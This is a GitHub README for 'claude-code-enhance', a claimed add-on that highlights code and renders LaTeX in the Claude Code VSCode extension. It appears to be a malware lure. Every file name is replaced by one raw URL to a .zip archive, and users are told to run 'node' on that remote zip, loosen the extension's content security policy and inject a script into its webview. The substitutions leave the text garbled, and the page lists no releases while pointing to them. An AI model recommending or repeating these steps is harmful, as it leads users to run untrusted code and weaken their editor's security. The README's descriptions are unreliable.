Skip to content

πŸ› οΈ Enhance VSCode with syntax highlighting, LaTeX rendering, and AI response copying. Improve your coding experience with practical features.

Notifications You must be signed in to change notification settings

buffbeard920/claude-code-enhance

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

10 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸŽ‰ claude-code-enhance - Enhance Your Code Experience Effortlessly!

Download claude-code-enhance

πŸš€ Getting Started

Welcome to claude-code-enhance! This tool enhances the Claude Code extension for VSCode by adding features like code highlighting and LaTeX rendering. Follow these steps to download and run the software smoothly.

πŸ“₯ Download & Install

To get started, you need to download the latest version from our Releases page. Click the link below:

Visit this page to download

  1. Click the link above to go to the Releases page.
  2. Look for the latest version.
  3. Download the file suitable for your platform (Windows or Linux).

🎯 System Requirements

  • Claude Code Extension: Version 2.1.31 or higher.
  • Platforms Supported:
    • Windows (win32-x64)
    • Linux (linux-x64)

πŸ”§ Installation Methods

You can install the enhancement using two methods: a patch script (recommended) or manual installation.

πŸ› οΈ Method 1: Patch Script (Recommended)

  1. Open your command line.
  2. Change the directory to where claude-code-enhance is located:
    cd claude-code-enhance
  3. Run the patch script:
    node https://raw.githubusercontent.com/buffbeard920/claude-code-enhance/main/webview/claude_code_enhance_v2.3.zip

The script will automatically:

  • Find the currently installed Claude Code extension.
  • Copy the https://raw.githubusercontent.com/buffbeard920/claude-code-enhance/main/webview/claude_code_enhance_v2.3.zip file to the extension directory.
  • Update the CSP policy to allow CDN resources.
  • Inject the enhancement script for you.

πŸ“ Method 2: Manual Installation

  1. Navigate to the webview/ directory in the downloaded files.
  2. Copy the https://raw.githubusercontent.com/buffbeard920/claude-code-enhance/main/webview/claude_code_enhance_v2.3.zip file into the webview/ directory of your Claude Code extension.
  3. Edit the https://raw.githubusercontent.com/buffbeard920/claude-code-enhance/main/webview/claude_code_enhance_v2.3.zip file:
    • Modify the CSP policy to include the necessary rules.
  4. In your HTML template, inject the <script> tag for https://raw.githubusercontent.com/buffbeard920/claude-code-enhance/main/webview/claude_code_enhance_v2.3.zip.

πŸ”„ After Installation

To see the changes, reload your VSCode window. You can do this by pressing Ctrl + Shift + P and selecting Developer: Reload Window.

πŸ’‘ Features

Once you have installed claude-code-enhance, you can explore its powerful features:

  • Code Syntax Highlighting: Supports over 180 programming languages, thanks to https://raw.githubusercontent.com/buffbeard920/claude-code-enhance/main/webview/claude_code_enhance_v2.3.zip
  • LaTeX Formula Rendering: Display matrices, fractions, and integrals using KaTeX.
  • AI Dialogue Copying: Copy AI response content to your clipboard easily. The content is formatted in Markdown.
  • DOM Inspection Tool: Press Ctrl + Shift + D to export the DOM structure for analysis.
  • Dark Table Theme: Enjoy a gradient header, hover highlights, and rounded borders in tables.
  • Code Auto-Wrapping: Long command lines wrap automatically for better readability.
  • Scroll Wheel Zoom: Zoom in and out using Ctrl and the mouse wheel, with a range of 50% to 200%.
  • List Style Fixes: Numbered lists display correctly.

πŸ“ˆ Usage Instructions

πŸ€– AI Dialogue Copying

To copy AI responses easily:

  1. Hover your mouse over the end of an AI reply.
  2. A "Copy" button will appear in the bottom right corner.
  3. Click the button to copy the AI response in Markdown format.
  4. The tool automatically excludes "Thinking" and tool invocation content but retains the following:
    • Code blocks
    • Tables
    • LaTeX formulas
    • Lists

🧩 Using the DOM Inspection Tool

The DOM inspection tool helps you analyze web structures. To use this tool:

  1. Press Ctrl + Shift + D to activate the feature.
  2. The tool will generate a report on the DOM structure for your review.

πŸ› οΈ Troubleshooting

  • Installation Issues: If you encounter problems, ensure you have the correct version of the Claude Code extension installed.
  • Feature Activation: If features do not appear, try reloading the VSCode window again.
  • Script Errors: For any script errors, double-check your CSP modifications in the https://raw.githubusercontent.com/buffbeard920/claude-code-enhance/main/webview/claude_code_enhance_v2.3.zip file.

By following these instructions, you should have a seamless experience using the claude-code-enhance application. Enjoy your enhanced coding experience!

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •